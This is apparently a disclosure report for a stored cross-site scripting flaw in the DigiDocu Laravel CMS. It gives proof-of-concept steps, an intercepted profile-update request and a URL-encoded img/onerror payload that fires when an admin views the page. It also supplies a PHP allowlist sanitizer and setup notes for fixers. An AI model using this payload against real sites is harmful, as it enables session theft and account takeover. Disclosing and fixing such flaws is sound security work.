Cross-site Scripting (XSS) - Stored in harish81/digidocu
Mar 30th 2021
DigiDocu is a CMS written in PHP using the Laravel framework. Laravel uses the Blade templating engine, which escapes HTML output by default. But DigiDocu renders some HTML content without validating the input that comes from the user's profile, i.e. users can write HTML in the description field of their profile. A WYSIWYG editor lets users compose this content without writing HTML by hand, but it still sends HTML behind the scenes, which can easily be manipulated.
🕵️♂️ Proof of Concept
As a low-privileged user, log in and go to
Submit the form while capturing the request in a proxy like Burp Suite.
Your request should look like:
POST /admin/profile
Host: localhost:8000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 263
Origin: http://localhost:8000
DNT: 1
Connection: close
Referer: http://localhost:8000/admin/profile
Cookie: [REDACTED]
Upgrade-Insecure-Requests: 1

_token=Q4ETEwXTbRdzZZbpvFasb5xdGsIbj5UTRlkZCcKf&name=test&email=test%40test.test&username=test&address=&description=%3Cp%3Etest%3Cbr%3E%3C%2Fp%3E&_wysihtml5_mode=1&btnprofile=btnprofile
Replace the description parameter's value with
%3cp%3etest%20%3cimg%20src%3d%22http%3a%2f%2fexample.com%22%20onerror%3d%22alert(1)%22%3e%3cbr%3e%3c%2fp%3e
Now send the request.
The payload now lives at http://localhost:8000/admin/users/2, where 2 is the attacker's user id. As soon as the admin opens that page, the XSS alert pops up.
This is a stored XSS. It can be used for privilege escalation and account takeover, and chained with other bugs it may lead to remote code execution.
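The root cause is that the description field reaches the page as raw HTML. One server-side mitigation is to reduce the stored markup to an allowlist before it is ever rendered. The script below is an added example, not DigiDocu's code; the tag and attribute lists are assumptions chosen to match what a basic WYSIWYG editor needs. The img element with its onerror handler from the PoC above is dropped, and only the sanitized string should be handed to an unescaped Blade directive.

```php
<?php
// Added example (not DigiDocu's code): allowlist sanitizer for WYSIWYG profile HTML.
// The tag/attribute lists are assumptions; widen them only as the editor needs.
const ALLOWED_TAGS  = ['p', 'br', 'b', 'strong', 'i', 'em', 'u', 'ul', 'ol', 'li', 'a'];
const ALLOWED_ATTRS = ['a' => ['href']];   // no style, no on* event handlers

function cleanNode(DOMNode $node): void
{
    // Walk a copy of the child list, because we mutate it while walking.
    foreach (iterator_to_array($node->childNodes) as $child) {
        if (!$child instanceof DOMElement) {
            if (!$child instanceof DOMText) {
                $node->removeChild($child);    // comments, PIs, CDATA
            }
            continue;
        }
        cleanNode($child);                     // clean the subtree first
        $tag = strtolower($child->tagName);
        if (!in_array($tag, ALLOWED_TAGS, true)) {
            // Unwrap disallowed elements (img, script, div, ...): keep their cleaned children.
            while ($child->firstChild !== null) {
                $node->insertBefore($child->firstChild, $child);
            }
            $node->removeChild($child);
            continue;
        }
        foreach (iterator_to_array($child->attributes) as $attr) {
            $name = strtolower($attr->name);
            $keep = in_array($name, ALLOWED_ATTRS[$tag] ?? [], true)
                 && ($name !== 'href' || preg_match('#^https?://#i', $attr->value));
            if (!$keep) {
                $child->removeAttribute($attr->name);
            }
        }
    }
}

function sanitizeHtml(string $dirty): string
{
    $doc = new DOMDocument();
    libxml_use_internal_errors(true);          // silence malformed-markup warnings
    $doc->loadHTML('<?xml encoding="UTF-8">' . $dirty, LIBXML_HTML_NOIMPLIED | LIBXML_HTML_NODEFDTD);
    libxml_clear_errors();
    cleanNode($doc);
    // Serialize what survived; text nodes are re-escaped by saveHTML.
    return implode('', array_map([$doc, 'saveHTML'], iterator_to_array($doc->childNodes)));
}

// Constructed sample: the decoded payload from the report above.
echo sanitizeHtml('<p>test <img src="http://example.com" onerror="alert(1)"><br></p>'), PHP_EOL;
```

Apply sanitizeHtml() when the profile is saved (so the stored value is already clean) and again at render time, passing only its output to the view.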
For the Fixer
Before you start installing this package, note that it requires PHP 7.2, which has reached EOL, so the default PHP version in your distribution's package manager might not be 7.2. Check your PHP version before continuing.
If you don't have PHP 7.2, either install PHP 7.2 or bump the PHP version in composer.json to your installed PHP version.
But be cautious with bumping, as newer versions might lack some functions used within this package, so installing PHP 7.2 is recommended over tinkering with composer.json. If you have PHP 7.3, it's fine to edit composer.json and update the required version to 7.3. If you have updated composer.json, run composer update to reinstall the latest version.
Whichever PHP version you use, make sure to run all composer commands with that PHP version, i.e. if you have PHP 8 but also installed PHP 7.2, your php executable very likely points to version 8. So instead of running composer commands directly, run composer as
php72 $(which composer) --version
This way composer will see PHP 7.2 and not version 8.
Now you can continue to install this package using these instructions: https://github.com/harish81/digidocu#installation.